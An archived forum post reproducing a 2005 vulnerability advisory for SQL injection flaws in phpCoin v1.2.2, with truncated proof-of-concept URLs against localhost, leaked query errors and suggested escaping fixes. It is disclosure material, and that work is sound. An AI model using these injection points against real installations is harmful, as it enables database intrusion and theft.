Multiple Sql Injections In Phpcoin V1.2.2

Full Version: Multiple Sql Injections In Phpcoin V1.2.2

GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives

qcred11

May 4 2005, 01:51 AM

QUOTE

Multiple Sql injections in phpCoin v1.2.2 and below

Severity: High
Title: Multiple Sql injections in phpCoin v1.2.2 and below
Date: 28/04/2005
Vendor: phpCoin
Vendor Website: http://www.phpcoin.com/
Vendor contact status: Contacted 5 days before release of advisory, but no response.

Proof of Concept Exploits:

http://docs.localhost/index.php?title=Spec...=(SQL_INJECTION
SQL INJECTION
A database query syntax error has occurred. This could be because of an illegal
search query (see Searching PhpCOIN Docs), or it may indicate a bug in the software. The last attempted database query was:

SELECT cur_id,cur_namespace,cur_title,cur_text FROM cur,searchindex WHERE
cur_id=si_page AND ( ( (MATCH (si_title) AGAINST ('SQL_INJECTION')) ) AND
cur_namespace IN (0,9,11) LIMIT 0, 20

from within function "SearchEngine::showResults". MySQL returned error "1064: You
have an error in your SQL syntax near 'LIMIT 0, 20' at line 1".

http://localhost/login.php?w=user&o=login&..._INJECTION'
SQL_INJECTION

Unable to execute query: (SELECT * FROM phpcoin_components WHERE comp_name='siteinfo'
AND comp_mod='SQL_INJECTION\' ORDER BY comp_id ASC).
Error returned is: ( : ).
Check the syntax / server connection and and try again.

http://localhost/mod.php?mod=siteinfo&id=S...ece6b64db3d9b95
SQL INJECTION

Unable to execute query: (SELECT * FROM phpcoin_components WHERE comp_name='siteinfo'
AND comp_mod='SQL_INJECTION\' ORDER BY comp_id ASC).
Error returned is: ( : ).
Check the syntax / server connection and and try again.

http://localhost/mod.php?mod=pages&mode=li...838930de0f99f4b
SQL INJECTION

Database Error:
Unable to execute query: (SELECT COUNT(*) FROM phpcoin_pages, phpcoin_topics,
phpcoin_categories WHERE phpcoin_pages.topic_id = phpcoin_topics.topic_id AND
phpcoin_pages.cat_id = phpcoin_categories.cat_id AND phpcoin_pages.topic_id =
SQL_INJECTION\ AND phpcoin_pages.pages_admin = 0 AND phpcoin_pages.pages_status = 1).
Error returned is: ( : ).
Check the syntax / server connection and and try again.

Database Error:
Unable to execute query: (SELECT phpcoin_pages.id, phpcoin_pages.subject,
phpcoin_pages.topic_id, phpcoin_pages.cat_id, phpcoin_pages.time_stamp,
phpcoin_pages.pages_title, phpcoin_pages.pages_code, phpcoin_pages.pages_block_it,
phpcoin_pages.pages_status, phpcoin_pages.pages_admin, phpcoin_topics.topic_name,
phpcoin_categories.cat_name FROM phpcoin_pages, phpcoin_topics, phpcoin_categories
WHERE phpcoin_pages.topic_id = phpcoin_topics.topic_id AND phpcoin_pages.cat_id =
phpcoin_categories.cat_id AND phpcoin_pages.topic_id = SQL_INJECTION\ AND
phpcoin_pages.pages_admin = 0 AND phpcoin_pages.pages_status = 1 ORDER BY time_stamp
DESC LIMIT 0, 15).
Error returned is: ( : ).
Check the syntax / server connection and and try again.

http://localhost/mod.php?mod=pages&mode=li...838930de0f99f4b
SQL INJECTION

Database Error:
Unable to execute query: (SELECT COUNT(*) FROM phpcoin_pages, phpcoin_topics,
phpcoin_categories WHERE phpcoin_pages.topic_id = phpcoin_topics.topic_id AND
phpcoin_pages.cat_id = phpcoin_categories.cat_id AND phpcoin_pages.cat_id =
SQL_INJECTION\ AND phpcoin_pages.pages_admin = 0 AND phpcoin_pages.pages_status = 1).
Error returned is: ( : ).
Check the syntax / server connection and and try again.

Database Error:
Unable to execute query: (SELECT phpcoin_pages.id, phpcoin_pages.subject,
phpcoin_pages.topic_id, phpcoin_pages.cat_id, phpcoin_pages.time_stamp,
phpcoin_pages.pages_title, phpcoin_pages.pages_code, phpcoin_pages.pages_block_it,
phpcoin_pages.pages_status, phpcoin_pages.pages_admin, phpcoin_topics.topic_name,
phpcoin_categories.cat_name FROM phpcoin_pages, phpcoin_topics, phpcoin_categories
WHERE phpcoin_pages.topic_id = phpcoin_topics.topic_id AND phpcoin_pages.cat_id =
phpcoin_categories.cat_id AND phpcoin_pages.cat_id = SQL_INJECTION\ AND
phpcoin_pages.pages_admin = 0 AND phpcoin_pages.pages_status = 1 ORDER BY time_stamp
DESC LIMIT 0, 15).
Error returned is: ( : ).
Check the syntax / server connection and and try again.

Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(),
mysql_real_escape_string() and other functions for input validation before passing
user input to the mysql database, or before echoing data on the screen, would solve
these problems.

Author:
These vulnerabilties have been found and released by Diabolic Crab

Link is unavailable

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.